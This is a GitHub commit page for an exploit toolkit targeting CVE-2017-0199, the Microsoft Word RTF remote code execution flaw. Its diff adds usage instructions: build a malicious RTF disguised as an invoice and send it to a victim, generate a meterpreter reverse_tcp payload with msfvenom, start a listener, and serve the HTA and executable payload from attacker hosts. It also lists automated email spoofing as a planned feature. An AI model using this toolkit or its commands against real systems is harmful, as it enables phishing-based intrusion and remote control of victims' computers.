Skip to content

Commit

Permalink
Merge pull request #4 from bhdresh/v2.0-beta-2
Browse files Browse the repository at this point in the history 
V2.0 beta 2
  • Loading branch information
@bhdresh
bhdresh committed Apr 19, 2017
2 parents 3cad9a3 + 666d49b commit cac2510
Show file tree
Hide file tree
Showing 2 changed files with 127 additions and 14 deletions.
6 changes: 5 additions & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,13 +2,17 @@

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.

### Video tutorial

https://youtu.be/42LjG7bAvpg

### Release note:

Introduced following capabilities to the script

- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13

### Future release:

Expand Down Expand Up @@ -79,7 +83,7 @@ Working on following feature

-p <TCP port:Default 80> Local port number.

-e <http://example.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.

-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

Expand Down
135 changes: 122 additions & 13 deletions cve-2017-0199_toolkit.py
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,96 @@
'''
## Exploit toolkit CVE-2017-0199 - v2.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.
### Release note:
Introduced following capabilities to the script
- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13
### Future release:
Working on following feature
- Automatically send generated malicious RTF to victim using email spoofing
### Example:
- Step 1: Generate malicious RTF file using following command and send it to victim
Syntax:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler
Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
- Step 3: Start toolkit in exploitation mode to deliver payloads
Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
### Command line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
'''

import os,sys,thread,socket,sys,getopt

BACKLOG = 50 # how many pending connections queue will hold
Expand All @@ -11,17 +104,19 @@ def main(argv):
global docuri
global payloadurl
global payloadlocation
global mode
filename = ''
docuri = ''
payloadurl = ''
payloadlocation = ''
port = int("80")
host = ''
mode = ''
# Capture command line arguments
try:
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation="])
except getopt.GetoptError:
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
Expand Down Expand Up @@ -53,23 +148,27 @@ def main(argv):
payloadlocation = arg
if "gen" in mode:
if (len(filename)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(docuri)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
print "Generating payload"
generate_exploit_rtf()
mode = 'Finished'
if "exp" in mode:
if (len(payloadurl)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadlocation)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
print "Running exploit mode - waiting for victim to connect"
exploitation()

mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
def generate_exploit_rtf():
# Preparing malicious Doc
s = docuri
Expand Down Expand Up @@ -151,17 +250,27 @@ def server_thread(conn, client_addr):
try:
request = conn.recv(MAX_DATA_RECV)
if (len(request) > 0):
# parse the first line
# parse the first line
first_line = request.split('\n')[0]

# get method
# get method
method = first_line.split(' ')[0]
# get url
url = first_line.split(' ')[1]
# get url
try:
url = first_line.split(' ')[1]
except IndexError:
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
size = os.path.getsize(payloadlocation)
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
with open(payloadlocation) as fin:
data +=fin.read()
Expand All @@ -183,7 +292,7 @@ def server_thread(conn, client_addr):
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/doc\r\n\r\n"
conn.send(data)
conn.close()
sys.exit(1)
sys.exit(1)
except socket.error, ex:
print ex
if __name__ == '__main__':
Expand Down

0 comments on commit cac2510

Please sign in to comment.